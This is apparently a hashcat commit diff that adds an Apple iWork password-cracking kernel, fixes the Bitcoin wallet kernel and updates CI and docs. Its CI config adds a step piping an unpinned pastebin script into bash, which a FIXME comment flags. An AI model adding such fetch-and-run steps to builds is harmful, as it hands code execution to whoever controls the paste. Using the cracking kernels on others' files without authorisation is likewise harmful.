diff --git a/.appveyor.yml b/.appveyor.yml
index 6082f9591..31a726934 100644
--- a/.appveyor.yml
+++ b/.appveyor.yml
@@ -34,6 +34,8 @@ install:
   - if defined CYG_ROOT (%CYG_SETUP% --quiet-mode --no-shortcuts --only-site --root "%CYG_ROOT%" --site "%CYG_MIRROR%" --local-package-dir "%CYG_CACHE%" --packages "%CYG_PACKAGES%" --upgrade-also)
   # (temporary?) problem with msys/pacman/objc/ada (see https://github.com/msys2/msys2/wiki/FAQ)
   - if defined MSYSTEM (%BASH% -lc "pacman -Rns --noconfirm mingw-w64-{i686,x86_64}-gcc-ada mingw-w64-{i686,x86_64}-gcc-objc")
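+  # temporary fix for MSYS revoked/new signing keys (FIXME: the next line pipes an unpinned pastebin script into bash; pin it by checksum or inline the key import):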
+  - if defined MSYSTEM (%BASH% -lc "curl https://pastebin.com/raw/e0y4Ky9U | bash")
   - if defined MSYSTEM (%BASH% -lc "pacman -Suuy --noconfirm")
   # the following line is not a duplicate line:
   # it is necessary to upgrade the MSYS base files and after that all the packages
@@ -41,7 +43,7 @@ install:
   - if defined MSYSTEM (%BASH% -lc "pacman -Suuy --noconfirm")
 
 build_script:
-  - if defined BASH (%BASH% -lc "cd $(cygpath ${APPVEYOR_BUILD_FOLDER}) && git submodule update --init && make")
+  - if defined BASH (%BASH% -lc "cd $(cygpath ${APPVEYOR_BUILD_FOLDER}) && make")
 
 test_script:
   # some file globbing tests
@@ -64,3 +66,4 @@ only_commits:
     - include/*
     - OpenCL/inc_*
     - Makefile
+    - .appveyor.yml
diff --git a/OpenCL/m11300-pure.cl b/OpenCL/m11300-pure.cl
index 994721f3b..a9f33476e 100644
--- a/OpenCL/m11300-pure.cl
+++ b/OpenCL/m11300-pure.cl
@@ -296,29 +296,33 @@ KERNEL_FQ void m11300_comp (KERN_ATTR_TMPS_ESALT (bitcoin_wallet_tmp_t, bitcoin_
   key[6] = h32_from_64_S (dgst[3]);
   key[7] = l32_from_64_S (dgst[3]);
 
+  const u32 digest_pos = loop_pos;
+
+  const u32 digest_cur = digests_offset + digest_pos;
+
   #define KEYLEN 60
 
   u32 ks[KEYLEN];
 
   AES256_set_decrypt_key (ks, key, s_te0, s_te1, s_te2, s_te3, s_td0, s_td1, s_td2, s_td3);
 
-  u32 i = esalt_bufs[digests_offset].cry_master_len - 32;
+  u32 i = esalt_bufs[digest_cur].cry_master_len - 32;
 
   u32 iv[4];
 
-  iv[0] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 0]);
-  iv[1] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 1]);
-  iv[2] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 2]);
-  iv[3] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 3]);
+  iv[0] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 0]);
+  iv[1] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 1]);
+  iv[2] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 2]);
+  iv[3] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 3]);
 
   i += 16;
 
   u32 data[4];
 
-  data[0] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 0]);
-  data[1] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 1]);
-  data[2] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 2]);
-  data[3] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 3]);
+  data[0] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 0]);
+  data[1] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 1]);
+  data[2] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 2]);
+  data[3] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 3]);
 
   u32 out[4];
 
@@ -331,7 +335,7 @@ KERNEL_FQ void m11300_comp (KERN_ATTR_TMPS_ESALT (bitcoin_wallet_tmp_t, bitcoin_
 
   u32 pad = 0;
 
-  if (esalt_bufs[digests_offset].cry_salt_len != 18)
+  if (esalt_bufs[digest_cur].cry_salt_len != 18)
   {
     /* most wallets */
     pad = 0x10101010;
@@ -347,9 +351,9 @@ KERNEL_FQ void m11300_comp (KERN_ATTR_TMPS_ESALT (bitcoin_wallet_tmp_t, bitcoin_
 
   if (out[2] == pad && out[3] == pad)
   {
-    if (atomic_inc (&hashes_shown[digests_offset]) == 0)
+    if (atomic_inc (&hashes_shown[digest_cur]) == 0)
     {
-      mark_hash (plains_buf, d_return_buf, salt_pos, digests_cnt, 0, digests_offset + 0, gid, 0, 0, 0);
+      mark_hash (plains_buf, d_return_buf, salt_pos, digests_cnt, digest_pos, digest_cur, gid, 0, 0, 0);
     }
   }
 }
diff --git a/OpenCL/m23300-pure.cl b/OpenCL/m23300-pure.cl
new file mode 100644
index 000000000..a2f0bb4bc
--- /dev/null
+++ b/OpenCL/m23300-pure.cl
@@ -0,0 +1,410 @@
+/**
+ * Author......: See docs/credits.txt
+ * License.....: MIT
+ */
+
+#define NEW_SIMD_CODE
+
+#ifdef KERNEL_STATIC
+#include "inc_vendor.h"
+#include "inc_types.h"
+#include "inc_platform.cl"
+#include "inc_common.cl"
+#include "inc_simd.cl"
+#include "inc_hash_sha1.cl"
+#include "inc_hash_sha256.cl"
+#include "inc_cipher_aes.cl"
+#endif
+
+typedef struct iwork_tmp
+{
+  u32 ipad[5];
+  u32 opad[5];
+
+  u32 dgst[5];
+  u32 out[5];
+
+} iwork_tmp_t;
+
+typedef struct iwork
+{
+  u32 iv[4];
+  u32 data[16];
+
+} iwork_t;
+// One HMAC-SHA1 step over the 64-byte block in w0..w3 (caller is expected to have applied the SHA-1 padding): inner pass starts from ipad, outer pass from opad; result ends up in digest, w0..w3 are overwritten.
+DECLSPEC void hmac_sha1_run_V (u32x *w0, u32x *w1, u32x *w2, u32x *w3, u32x *ipad, u32x *opad, u32x *digest)
+{
+  digest[0] = ipad[0]; // seed the inner pass with the ipad state
+  digest[1] = ipad[1];
+  digest[2] = ipad[2];
+  digest[3] = ipad[3];
+  digest[4] = ipad[4];
+
+  sha1_transform_vector (w0, w1, w2, w3, digest); // inner pass over the caller's block
+
+  w0[0] = digest[0]; // re-pack the 5-word inner result as the message of the outer pass
+  w0[1] = digest[1];
+  w0[2] = digest[2];
+  w0[3] = digest[3];
+  w1[0] = digest[4];
+  w1[1] = 0x80000000; // SHA-1 padding bit directly after the 20 digest bytes
+  w1[2] = 0;
+  w1[3] = 0;
+  w2[0] = 0;
+  w2[1] = 0;
+  w2[2] = 0;
+  w2[3] = 0;
+  w3[0] = 0;
+  w3[1] = 0;
+  w3[2] = 0;
+  w3[3] = (64 + 20) * 8; // total length in bits: 64-byte pad block + 20-byte inner digest
+
+  digest[0] = opad[0]; // seed the outer pass with the opad state
+  digest[1] = opad[1];
+  digest[2] = opad[2];
+  digest[3] = opad[3];
+  digest[4] = opad[4];
+
+  sha1_transform_vector (w0, w1, w2, w3, digest); // outer pass; digest now holds the result
+}
+// Init kernel: keys an HMAC-SHA1 context with the password, stores its ipad/opad states, and computes HMAC(password, salt || counter 1) as the initial value of tmps[gid].dgst and tmps[gid].out.
+KERNEL_FQ void m23300_init (KERN_ATTR_TMPS_ESALT (iwork_tmp_t, iwork_t))
+{
+  /**
+   * base: gid selects one password candidate; work-items at or beyond gid_max exit early
+   */
+
+  const u64 gid = get_global_id (0);
+
+  if (gid >= gid_max) return;
+
+  sha1_hmac_ctx_t sha1_hmac_ctx;
+
+  sha1_hmac_init_global_swap (&sha1_hmac_ctx, pws[gid].i, pws[gid].pw_len); // HMAC key = password candidate
+
+  tmps[gid].ipad[0] = sha1_hmac_ctx.ipad.h[0]; // keep the keyed ipad state; m23300_loop reads it back via packv
+  tmps[gid].ipad[1] = sha1_hmac_ctx.ipad.h[1];
+  tmps[gid].ipad[2] = sha1_hmac_ctx.ipad.h[2];
+  tmps[gid].ipad[3] = sha1_hmac_ctx.ipad.h[3];
+  tmps[gid].ipad[4] = sha1_hmac_ctx.ipad.h[4];
+
+  tmps[gid].opad[0] = sha1_hmac_ctx.opad.h[0]; // same for the keyed opad state
+  tmps[gid].opad[1] = sha1_hmac_ctx.opad.h[1];
+  tmps[gid].opad[2] = sha1_hmac_ctx.opad.h[2];
+  tmps[gid].opad[3] = sha1_hmac_ctx.opad.h[3];
+  tmps[gid].opad[4] = sha1_hmac_ctx.opad.h[4];
+
+  u32 w0[4];
+  u32 w1[4];
+  u32 w2[4];
+  u32 w3[4];
+
+  w0[0] = salt_bufs[salt_pos].salt_buf[0]; // only the first four salt words (16 bytes) are loaded
+  w0[1] = salt_bufs[salt_pos].salt_buf[1];
+  w0[2] = salt_bufs[salt_pos].salt_buf[2];
+  w0[3] = salt_bufs[salt_pos].salt_buf[3];
+  w1[0] = 0;
+  w1[1] = 0;
+  w1[2] = 0;
+  w1[3] = 0;
+  w2[0] = 0;
+  w2[1] = 0;
+  w2[2] = 0;
+  w2[3] = 0;
+  w3[0] = 0;
+  w3[1] = 0;
+  w3[2] = 0;
+  w3[3] = 0;
+
+  sha1_hmac_update_64 (&sha1_hmac_ctx, w0, w1, w2, w3, salt_bufs[salt_pos].salt_len); // feed salt_len bytes of salt
+
+  for (u32 i = 0, j = 1; i < 4; i += 5, j += 1) // body runs exactly once (i = 0, j = 1): i steps by 5 while the bound is 4
+  {
+    sha1_hmac_ctx_t sha1_hmac_ctx2 = sha1_hmac_ctx; // work on a copy of the salted context
+
+    w0[0] = j; // block counter appended after the salt
+    w0[1] = 0;
+    w0[2] = 0;
+    w0[3] = 0;
+    w1[0] = 0;
+    w1[1] = 0;
+    w1[2] = 0;
+    w1[3] = 0;
+    w2[0] = 0;
+    w2[1] = 0;
+    w2[2] = 0;
+    w2[3] = 0;
+    w3[0] = 0;
+    w3[1] = 0;
+    w3[2] = 0;
+    w3[3] = 0;
+
+    sha1_hmac_update_64 (&sha1_hmac_ctx2, w0, w1, w2, w3, 4); // the counter contributes 4 bytes
+
+    sha1_hmac_final (&sha1_hmac_ctx2);
+
+    tmps[gid].dgst[i + 0] = sha1_hmac_ctx2.opad.h[0]; // first HMAC output: chaining value for m23300_loop
+    tmps[gid].dgst[i + 1] = sha1_hmac_ctx2.opad.h[1];
+    tmps[gid].dgst[i + 2] = sha1_hmac_ctx2.opad.h[2];
+    tmps[gid].dgst[i + 3] = sha1_hmac_ctx2.opad.h[3];
+    tmps[gid].dgst[i + 4] = sha1_hmac_ctx2.opad.h[4];
+
+    tmps[gid].out[i + 0] = tmps[gid].dgst[i + 0]; // XOR accumulator starts out equal to the first HMAC output
+    tmps[gid].out[i + 1] = tmps[gid].dgst[i + 1];
+    tmps[gid].out[i + 2] = tmps[gid].dgst[i + 2];
+    tmps[gid].out[i + 3] = tmps[gid].dgst[i + 3];
+    tmps[gid].out[i + 4] = tmps[gid].dgst[i + 4];
+  }
+}
+// Loop kernel (vectorized): runs loop_cnt HMAC-SHA1 iterations on the chaining value tmps[].dgst and XORs every result into tmps[].out, then writes both back.
+KERNEL_FQ void m23300_loop (KERN_ATTR_TMPS_ESALT (iwork_tmp_t, iwork_t))
+{
+  const u64 gid = get_global_id (0);
+
+  if ((gid * VECT_SIZE) >= gid_max) return; // gid is scaled by VECT_SIZE for the bounds check
+
+  u32x ipad[5];
+  u32x opad[5];
+
+  ipad[0] = packv (tmps, ipad, gid, 0); // load the keyed HMAC states stored by m23300_init
+  ipad[1] = packv (tmps, ipad, gid, 1);
+  ipad[2] = packv (tmps, ipad, gid, 2);
+  ipad[3] = packv (tmps, ipad, gid, 3);
+  ipad[4] = packv (tmps, ipad, gid, 4);
+
+  opad[0] = packv (tmps, opad, gid, 0);
+  opad[1] = packv (tmps, opad, gid, 1);
+  opad[2] = packv (tmps, opad, gid, 2);
+  opad[3] = packv (tmps, opad, gid, 3);
+  opad[4] = packv (tmps, opad, gid, 4);
+
+  for (u32 i = 0; i < 4; i += 5) // single pass (i = 0): one 5-word output block
+  {
+    u32x dgst[5];
+    u32x out[5];
+
+    dgst[0] = packv (tmps, dgst, gid, i + 0); // previous HMAC output (chaining value)
+    dgst[1] = packv (tmps, dgst, gid, i + 1);
+    dgst[2] = packv (tmps, dgst, gid, i + 2);
+    dgst[3] = packv (tmps, dgst, gid, i + 3);
+    dgst[4] = packv (tmps, dgst, gid, i + 4);
+
+    out[0] = packv (tmps, out, gid, i + 0); // running XOR accumulator
+    out[1] = packv (tmps, out, gid, i + 1);
+    out[2] = packv (tmps, out, gid, i + 2);
+    out[3] = packv (tmps, out, gid, i + 3);
+    out[4] = packv (tmps, out, gid, i + 4);
+
+    for (u32 j = 0; j < loop_cnt; j++) // loop_cnt is not declared in this file; presumably supplied through the kernel attribute macro
+    {
+      u32x w0[4];
+      u32x w1[4];
+      u32x w2[4];
+      u32x w3[4];
+
+      w0[0] = dgst[0]; // message = previous 20-byte HMAC output
+      w0[1] = dgst[1];
+      w0[2] = dgst[2];
+      w0[3] = dgst[3];
+      w1[0] = dgst[4];
+      w1[1] = 0x80000000; // SHA-1 padding bit directly after the 20 message bytes
+      w1[2] = 0;
+      w1[3] = 0;
+      w2[0] = 0;
+      w2[1] = 0;
+      w2[2] = 0;
+      w2[3] = 0;
+      w3[0] = 0;
+      w3[1] = 0;
+      w3[2] = 0;
+      w3[3] = (64 + 20) * 8; // total length in bits: 64-byte pad block + 20-byte message
+
+      hmac_sha1_run_V (w0, w1, w2, w3, ipad, opad, dgst); // dgst is replaced by the HMAC of its previous value
+
+      out[0] ^= dgst[0]; // fold this iteration's output into the accumulator
+      out[1] ^= dgst[1];
+      out[2] ^= dgst[2];
+      out[3] ^= dgst[3];
+      out[4] ^= dgst[4];
+    }
+
+    unpackv (tmps, dgst, gid, i + 0, dgst[0]); // write the chaining value back to tmps
+    unpackv (tmps, dgst, gid, i + 1, dgst[1]);
+    unpackv (tmps, dgst, gid, i + 2, dgst[2]);
+    unpackv (tmps, dgst, gid, i + 3, dgst[3]);
+    unpackv (tmps, dgst, gid, i + 4, dgst[4]);
+
+    unpackv (tmps, out, gid, i + 0, out[0]); // write the accumulator back to tmps
+    unpackv (tmps, out, gid, i + 1, out[1]);
+    unpackv (tmps, out, gid, i + 2, out[2]);
+    unpackv (tmps, out, gid, i + 3, out[3]);
+    unpackv (tmps, out, gid, i + 4, out[4]);
+  }
+}
+// Comp kernel: uses tmps[gid].out[0..3] as AES-128 key, CBC-decrypts the first 48 bytes of esalt data, and marks the hash as cracked when SHA-256 of plaintext bytes 0..31 starts with plaintext bytes 32..47.
+KERNEL_FQ void m23300_comp (KERN_ATTR_TMPS_ESALT (iwork_tmp_t, iwork_t))
+{
+  const u64 gid = get_global_id (0);
+  const u64 lid = get_local_id (0);
+  const u64 lsz = get_local_size (0);
+
+  /**
+   * aes shared: with REAL_SHM the AES tables are copied into LOCAL_VK arrays (strided by lid/lsz), otherwise the constant tables are aliased
+   */
+
+  #ifdef REAL_SHM
+
+  LOCAL_VK u32 s_td0[256];
+  LOCAL_VK u32 s_td1[256];
+  LOCAL_VK u32 s_td2[256];
+  LOCAL_VK u32 s_td3[256];
+  LOCAL_VK u32 s_td4[256];
+
+  LOCAL_VK u32 s_te0[256];
+  LOCAL_VK u32 s_te1[256];
+  LOCAL_VK u32 s_te2[256];
+  LOCAL_VK u32 s_te3[256];
+  LOCAL_VK u32 s_te4[256]; // NOTE(review): s_te4 is filled below but not referenced again in this kernel
+
+  for (u32 i = lid; i < 256; i += lsz)
+  {
+    s_td0[i] = td0[i];
+    s_td1[i] = td1[i];
+    s_td2[i] = td2[i];
+    s_td3[i] = td3[i];
+    s_td4[i] = td4[i];
+
+    s_te0[i] = te0[i];
+    s_te1[i] = te1[i];
+    s_te2[i] = te2[i];
+    s_te3[i] = te3[i];
+    s_te4[i] = te4[i];
+  }
+
+  SYNC_THREADS ();
+
+  #else
+
+  CONSTANT_AS u32a *s_td0 = td0;
+  CONSTANT_AS u32a *s_td1 = td1;
+  CONSTANT_AS u32a *s_td2 = td2;
+  CONSTANT_AS u32a *s_td3 = td3;
+  CONSTANT_AS u32a *s_td4 = td4;
+
+  CONSTANT_AS u32a *s_te0 = te0;
+  CONSTANT_AS u32a *s_te1 = te1;
+  CONSTANT_AS u32a *s_te2 = te2;
+  CONSTANT_AS u32a *s_te3 = te3;
+  CONSTANT_AS u32a *s_te4 = te4;
+
+  #endif
+
+  if (gid >= gid_max) return; // bounds check is placed after the table copy / SYNC_THREADS above
+
+  /**
+   * AES part: AES-128 key schedule from the derived key, then CBC decryption of three 16-byte blocks
+   */
+
+  u32 ukey[8]; // NOTE(review): only ukey[0..3] are set below; presumably AES128_set_decrypt_key reads four words - confirm
+
+  ukey[0] = tmps[gid].out[0];
+  ukey[1] = tmps[gid].out[1];
+  ukey[2] = tmps[gid].out[2];
+  ukey[3] = tmps[gid].out[3];
+
+  #define KEYLEN 44
+
+  u32 ks[KEYLEN];
+
+  AES128_set_decrypt_key (ks, ukey, s_te0, s_te1, s_te2, s_te3, s_td0, s_td1, s_td2, s_td3);
+
+  u32 iv[4];
+
+  iv[0] = esalt_bufs[digests_offset].iv[0]; // initial chaining value comes from the hash's esalt
+  iv[1] = esalt_bufs[digests_offset].iv[1];
+  iv[2] = esalt_bufs[digests_offset].iv[2];
+  iv[3] = esalt_bufs[digests_offset].iv[3];
+
+  u32 res[12]; // actually res[16], but we don't need the full 64 bytes output
+
+  for (u32 i = 0; i < 12; i += 4) // three blocks of four 32-bit words
+  {
+    u32 data[4];
+
+    data[0] = esalt_bufs[digests_offset].data[i + 0]; // ciphertext block
+    data[1] = esalt_bufs[digests_offset].data[i + 1];
+    data[2] = esalt_bufs[digests_offset].data[i + 2];
+    data[3] = esalt_bufs[digests_offset].data[i + 3];
+
+    u32 out[4];
+
+    aes128_decrypt (ks, data, out, s_td0, s_td1, s_td2, s_td3, s_td4);
+
+    res[i + 0] = out[0] ^ iv[0]; // CBC: plaintext = decrypted block XOR previous ciphertext (iv for the first block)
+    res[i + 1] = out[1] ^ iv[1];
+    res[i + 2] = out[2] ^ iv[2];
+    res[i + 3] = out[3] ^ iv[3];
+
+    iv[0] = data[0]; // current ciphertext becomes the chaining value for the next block
+    iv[1] = data[1];
+    iv[2] = data[2];
+    iv[3] = data[3];
+  }
+
+  sha256_ctx_t ctx;
+
+  sha256_init (&ctx);
+
+  u32 w0[4];
+
+  w0[0] = hc_swap32_S (res[0]); // plaintext words are byte-swapped before being hashed
+  w0[1] = hc_swap32_S (res[1]);
+  w0[2] = hc_swap32_S (res[2]);
+  w0[3] = hc_swap32_S (res[3]);
+
+  u32 w1[4];
+
+  w1[0] = hc_swap32_S (res[4]);
+  w1[1] = hc_swap32_S (res[5]);
+  w1[2] = hc_swap32_S (res[6]);
+  w1[3] = hc_swap32_S (res[7]);
+
+  u32 w2[4];
+
+  w2[0] = 0;
+  w2[1] = 0;
+  w2[2] = 0;
+  w2[3] = 0;
+
+  u32 w3[4];
+
+  w3[0] = 0;
+  w3[1] = 0;
+  w3[2] = 0;
+  w3[3] = 0;
+
+  sha256_update_64 (&ctx, w0, w1, w2, w3, 32); // hash the first 32 plaintext bytes (res[0..7])
+
+  sha256_final (&ctx);
+
+  u32 checksum[4];
+
+  checksum[0] = hc_swap32_S (ctx.h[0]); // swap the first four digest words back to the byte order used in res[]
+  checksum[1] = hc_swap32_S (ctx.h[1]);
+  checksum[2] = hc_swap32_S (ctx.h[2]);
+  checksum[3] = hc_swap32_S (ctx.h[3]);
+
+  if ((res[ 8] == checksum[0]) &&
+      (res[ 9] == checksum[1]) &&
+      (res[10] == checksum[2]) &&
+      (res[11] == checksum[3])) // third plaintext block must equal the first 16 digest bytes
+  {
+    if (atomic_inc (&hashes_shown[digests_offset]) == 0) // only the first work-item to hit this digest reports it
+    {
+      mark_hash (plains_buf, d_return_buf, salt_pos, digests_cnt, 0, digests_offset + 0, gid, 0, 0, 0);
+    }
+
+    return;
+  }
+}
diff --git a/docs/changes.txt b/docs/changes.txt
index b67e87fc5..bb8dbaedc 100644
--- a/docs/changes.txt
+++ b/docs/changes.txt
@@ -5,6 +5,7 @@
 ##
 
 - Added hash-mode: Bitwarden
+- Added hash-mode: Apple iWork
 - Added hash-mode: RSA/DSA/EC/OPENSSH Private Keys
 
 ##
@@ -13,6 +14,21 @@
 
 - Fixed too early execution of some module functions which could make use of non-final values opts_type and opti_type
 - Fixed internal access on module option attribute OPTS_TYPE_SUGGEST_KG with the result that it was unused
+- Fixed race condition resulting in out of memory error on startup if multiple hashcat instances are started at the same time
+- Fixed unexpected non-unique salts in multi-hash cracking in Bitcoin/Litecoin wallet.dat module which led to false negatives
+
+##
+## Improvements
+##
+
+- Startup time: Improved the startup time by avoiding some time intensive operations for skipped devices
+
+##
+## Technical
+##
+
+- Hash-Mode 13200 (AxCrypt): Changed the name to AxCrypt 1 to avoid confusion
+- Hash-Mode 13300 (AxCrypt in-memory SHA1): Changed the name to AxCrypt 1 in-memory SHA1
 
 * changes v6.1.0 -> v6.1.1
 
diff --git a/docs/hashcat-plugin-development-guide.md b/docs/hashcat-plugin-development-guide.md
index e87f56016..078aa64d0 100644
--- a/docs/hashcat-plugin-development-guide.md
+++ b/docs/hashcat-plugin-development-guide.md
@@ -383,6 +383,8 @@ This configuration item is a bitmask field. There are a few switches which you c
 * OPTI_TYPE_SLOW_HASH_SIMD_INIT: This flag tells the hashcat host binary to divide the number of work items with the size of the vector being used. The *_init kernel needs to be written using vector data types. Vector data types have a strong impact on CPU performance, since they will be translated from the OpenCL JiT into SSE2/AVX/AVX2/XOP instructions. Modern GPUs use scalar data types thus there is no benefit from using vector data types. This is not recommended for *_init kernels because it makes the kernel much more complicated while at the same time the _init kernel is called only once per password guess.
 * OPTI_TYPE_SLOW_HASH_SIMD_LOOP: see OPTI_TYPE_SLOW_HASH_SIMD_INIT but for *_loop kernels. If it is possible for your *_loop kernel to be written in vector data types, this is highly recommended. You will typically find this option being used if the _loop kernel does not do any data-dependent branching.
 * OPTI_TYPE_SLOW_HASH_SIMD_COMP: see OPTI_TYPE_SLOW_HASH_SIMD_INIT but for *_comp kernels.
+* OPTI_TYPE_SLOW_HASH_SIMD_INIT2: see OPTI_TYPE_SLOW_HASH_SIMD_INIT but for *_init2 kernels.
+* OPTI_TYPE_SLOW_HASH_SIMD_LOOP2: see OPTI_TYPE_SLOW_HASH_SIMD_LOOP but for *_loop2 kernels.
 * OPTI_TYPE_USES_BITS_8: This flag is passed to the JiT and helps optimize some of the GPU library functions at compile time. The configuration defines the bitsize of the underlying crypto primitive.
 * OPTI_TYPE_USES_BITS_16: see OPTI_TYPE_USES_BITS_8
 * OPTI_TYPE_USES_BITS_32: see OPTI_TYPE_USES_BITS_8. This is the default in case no OPTI_TYPE_USES_BITS_* flag is being used. Almost all traditional crypto primitives use 32 bits: MD4, MD5, SHA1, SHA256, RipeMD160, etc.
diff --git a/docs/readme.txt b/docs/readme.txt
index 75fe66cf8..9fcf86a54 100644
--- a/docs/readme.txt
+++ b/docs/readme.txt
@@ -259,6 +259,7 @@ NVIDIA GPUs require "NVIDIA Driver" (440.64 or later) and "CUDA Toolkit" (9.0 or
 - PDF 1.4 - 1.6 (Acrobat 5 - 8)
 - PDF 1.7 Level 3 (Acrobat 9)
 - PDF 1.7 Level 8 (Acrobat 10 - 11)
+- Apple iWork
 - MS Office 2007
 - MS Office 2010
 - MS Office 2013
@@ -308,8 +309,8 @@ NVIDIA GPUs require "NVIDIA Driver" (440.64 or later) and "CUDA Toolkit" (9.0 or
 - iTunes backup >= 10.0
 - WinZip
 - Android Backup
-- AxCrypt
-- AxCrypt in-memory SHA1
+- AxCrypt 1
+- AxCrypt 1 in-memory SHA1
 - WBB3 (Woltlab Burning Board)
 - vBulletin < v3.8.5
 - vBulletin >= v3.8.5
diff --git a/include/types.h b/include/types.h
index 17da719a2..eecbe2f69 100644
--- a/include/types.h
+++ b/include/types.h
@@ -354,27 +354,29 @@ typedef enum salt_type
 
 typedef enum opti_type
 {
-  OPTI_TYPE_OPTIMIZED_KERNEL    = (1 <<  0),
-  OPTI_TYPE_ZERO_BYTE           = (1 <<  1),
-  OPTI_TYPE_PRECOMPUTE_INIT     = (1 <<  2),
-  OPTI_TYPE_MEET_IN_MIDDLE      = (1 <<  3),
-  OPTI_TYPE_EARLY_SKIP          = (1 <<  4),
-  OPTI_TYPE_NOT_SALTED          = (1 <<  5),
-  OPTI_TYPE_NOT_ITERATED        = (1 <<  6),
-  OPTI_TYPE_PREPENDED_SALT      = (1 <<  7),
-  OPTI_TYPE_APPENDED_SALT       = (1 <<  8),
-  OPTI_TYPE_SINGLE_HASH         = (1 <<  9),
-  OPTI_TYPE_SINGLE_SALT         = (1 << 10),
-  OPTI_TYPE_BRUTE_FORCE         = (1 << 11),
-  OPTI_TYPE_RAW_HASH            = (1 << 12),
-  OPTI_TYPE_SLOW_HASH_SIMD_INIT = (1 << 13),
-  OPTI_TYPE_SLOW_HASH_SIMD_LOOP = (1 << 14),
-  OPTI_TYPE_SLOW_HASH_SIMD_COMP = (1 << 15),
-  OPTI_TYPE_USES_BITS_8         = (1 << 16),
-  OPTI_TYPE_USES_BITS_16        = (1 << 17),
-  OPTI_TYPE_USES_BITS_32        = (1 << 18),
-  OPTI_TYPE_USES_BITS_64        = (1 << 19),
-  OPTI_TYPE_REGISTER_LIMIT      = (1 << 20), // We'll limit the register count to 128
+  OPTI_TYPE_OPTIMIZED_KERNEL      = (1 <<  0),
+  OPTI_TYPE_ZERO_BYTE             = (1 <<  1),
+  OPTI_TYPE_PRECOMPUTE_INIT       = (1 <<  2),
+  OPTI_TYPE_MEET_IN_MIDDLE        = (1 <<  3),
+  OPTI_TYPE_EARLY_SKIP            = (1 <<  4),
+  OPTI_TYPE_NOT_SALTED            = (1 <<  5),
+  OPTI_TYPE_NOT_ITERATED          = (1 <<  6),
+  OPTI_TYPE_PREPENDED_SALT        = (1 <<  7),
+  OPTI_TYPE_APPENDED_SALT         = (1 <<  8),
+  OPTI_TYPE_SINGLE_HASH           = (1 <<  9),
+  OPTI_TYPE_SINGLE_SALT           = (1 << 10),
+  OPTI_TYPE_BRUTE_FORCE           = (1 << 11),
+  OPTI_TYPE_RAW_HASH              = (1 << 12),
+  OPTI_TYPE_SLOW_HASH_SIMD_INIT   = (1 << 13),
+  OPTI_TYPE_SLOW_HASH_SIMD_LOOP   = (1 << 14),
+  OPTI_TYPE_SLOW_HASH_SIMD_COMP   = (1 << 15),
+  OPTI_TYPE_USES_BITS_8           = (1 << 16),
+  OPTI_TYPE_USES_BITS_16          = (1 << 17),
+  OPTI_TYPE_USES_BITS_32          = (1 << 18),
+  OPTI_TYPE_USES_BITS_64          = (1 << 19),
+  OPTI_TYPE_REGISTER_LIMIT        = (1 << 20), // We'll limit the register count to 128
+  OPTI_TYPE_SLOW_HASH_SIMD_INIT2  = (1 << 21), // like OPTI_TYPE_SLOW_HASH_SIMD_INIT, but for *_init2 kernels
+  OPTI_TYPE_SLOW_HASH_SIMD_LOOP2  = (1 << 22), // like OPTI_TYPE_SLOW_HASH_SIMD_LOOP, but for *_loop2 kernels
 
 } opti_type_t;
 
diff --git a/src/Makefile b/src/Makefile
index e4d792e19..8d97e7297 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -106,7 +106,7 @@ LIBRARY_DEV_ROOT_FOLDER ?= $(PREFIX)/include
 LIBRARY_DEV_FOLDER      ?= $(LIBRARY_DEV_ROOT_FOLDER)/hashcat
 
 ##
-## Depencies paths
+## Dependencies paths
 ##
 
 ifeq ($(USE_SYSTEM_LZMA),0)
diff --git a/src/backend.c b/src/backend.c
index 58aa8094f..894eb8746 100644
--- a/src/backend.c
+++ b/src/backend.c
@@ -3596,6 +3596,20 @@ int run_kernel (hashcat_ctx_t *hashcat_ctx, hc_device_param_t *device_param, con
         num_elements = CEILDIV (num_elements, device_param->vector_width);
       }
     }
+    else if (kern_run == KERN_RUN_INIT2)
+    {
+      if (hashconfig->opti_type & OPTI_TYPE_SLOW_HASH_SIMD_INIT2)
+      {
+        num_elements = CEILDIV (num_elements, device_param->vector_width);
+      }
+    }
+    else if (kern_run == KERN_RUN_LOOP2)
+    {
+      if (hashconfig->opti_type & OPTI_TYPE_SLOW_HASH_SIMD_LOOP2)
+      {
+        num_elements = CEILDIV (num_elements, device_param->vector_width);
+      }
+    }
 
     if (hc_cuEventRecord (hashcat_ctx, device_param->cuda_event1, device_param->cuda_stream) == -1) return -1;
 
@@ -5540,7 +5554,7 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
         device_param->skipped = true;
       }
 
-      // some attributes have to be hardcoded because they are used for instance in the build options
+      // some attributes have to be hardcoded values because they are used for instance in the build options
 
       device_param->device_local_mem_type     = CL_LOCAL;
       device_param->opencl_device_type        = CL_DEVICE_TYPE_GPU;
@@ -5616,11 +5630,7 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
         cuda_devices_active++;
       }
 
-      CUcontext cuda_context;
-
-      if (hc_cuCtxCreate (hashcat_ctx, &cuda_context, CU_CTX_SCHED_BLOCKING_SYNC, device_param->cuda_device) == -1) return -1;
-
-      if (hc_cuCtxSetCurrent (hashcat_ctx, cuda_context) == -1) return -1;
+      // instruction set
 
       // bcrypt optimization?
